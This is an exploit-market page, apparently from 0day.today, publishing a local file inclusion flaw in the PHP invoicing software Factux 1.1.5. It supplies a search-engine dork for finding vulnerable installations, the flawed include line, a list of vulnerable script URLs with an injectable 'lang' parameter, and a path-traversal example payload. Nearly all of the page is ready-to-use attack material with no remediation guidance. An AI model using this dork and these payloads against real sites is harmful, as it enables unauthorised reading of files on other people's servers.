[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Factux Local File Include Vulnerability

Author
altbta
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12152
Category
web applications
Date add
06-05-2010
Platform
php
=======================================
Factux Local File Include Vulnerability
=======================================

[~] Title : Factux LFI Vulnerability
[~] Author: altbta [l_9[at]hotmail.com]
[~] download : http://www.toocharger.com/telecharger/scripts/factux/3468.htm

[~] dork: "Factux le facturier libre V 1.1.5"
 
### include_once("include/language/$lang.php");
 
[~] Vulnerable File :
 
http://127.0.0.1/Factux/admin_modif.php?lang=
http://127.0.0.1/Factux/admin?lang=
http://127.0.0.1/Factux/article_new.php?lang=
http://127.0.0.1/Factux/article_update.php?lang=
http://127.0.0.1/Factux/backup.php?lang=
http://127.0.0.1/Factux/backup_timeout.php?lang=
http://127.0.0.1/Factux/bon_suite.php?lang=
http://127.0.0.1/Factux/ca_annee.php?lang=
 
 
[~] Example :
 
http://[site]/factux/ca_annee.php?lang=../../index



#  0day.today [2024-07-05]  #